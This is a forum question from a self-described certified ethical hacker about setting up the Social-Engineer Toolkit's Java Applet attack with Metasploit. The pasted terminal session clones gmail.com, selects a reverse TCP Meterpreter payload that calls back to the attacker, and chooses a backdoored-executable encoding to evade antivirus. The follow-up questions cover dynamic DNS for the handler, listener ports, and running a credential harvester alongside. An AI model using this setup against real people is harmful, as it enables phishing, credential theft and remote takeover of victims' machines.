Hi, before I pose my query, I would like to introduce myself. I've been a CEH and ECSA for quite some time now. However, I'm still learning, and today I was just curious about understanding the routing of how SET is connected to the MSF.
Question: To make things simple I'm copying the lines from the Terminal and I'll point out what I'm referring to. Setting up JavaApplet in S.E.T:
1) Java Applet Attack Method
set:webattack>1
2) Site Cloner
set:webattack>2
[-] NAT/Port Forwarding can be used in the cases where your SET machine is
[-] not externally exposed and may be a different IP address than your reverse listener.
set> Are you using NAT/Port Forwarding [yes|no]: y
#####set:webattack> IP address to SET web server (this could be your external IP or hostname):***.***.***.***######
#####set:webattack> Is your payload handler (metasploit) on a different IP from your external NAT/Port FWD address [yes|no]:n#######
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:https://gmail.com
[*] Cloning the website: https://gmail.com
[*] Malicious java applet website prepped for deployment
What payload do you want to generate:
Name: Description:
1) Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker
2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker
set:payloads>2
Below is a list of encodings to try and bypass AV.
Select one of the below, 'backdoored executable' is typically the best.
1) avoid_utf8_tolower (Normal)
16) Backdoored Executable (BEST)
set:encoding>16
#####set:payloads> PORT of the listener [443]:#####
[*] Generating x64-based powershell injection code...
FIRST: The first HASHED line of code, "(this could be your external IP or hostname)". Can I use no-ip or other DNS instead of an IP address here? I have a dynamic IP issue here, since SET uses the IP to bind it to a HANDLER, where there is only REVERSE_TCP and no TCP_DNS.
SECOND: I seriously don't understand the second line of code that follows. If I put in a local static IP address in this field (after choosing 'yes'), would that make a difference? What would be the 'correct' option if I were to practice this over the Internet? Would I use the PUBLIC-IP/DNS just like I used it for the option before this one? And why would it ask for my HANDLER's IP when it generates its own handler? Please elaborate on this option, thank you.
THIRD: The last HASHED line that asks for a PORT, if I'm not wrong, this is the HANDLER's port?
LASTLY: I configured the SET_CONFIG to use a specific WEB_PORT, say '5555', but when this JavaAppletServer initializes, it speaks on 8080 and 8081. So how do I run CredentialHarvester alongside when they both are on different ports?
Thank you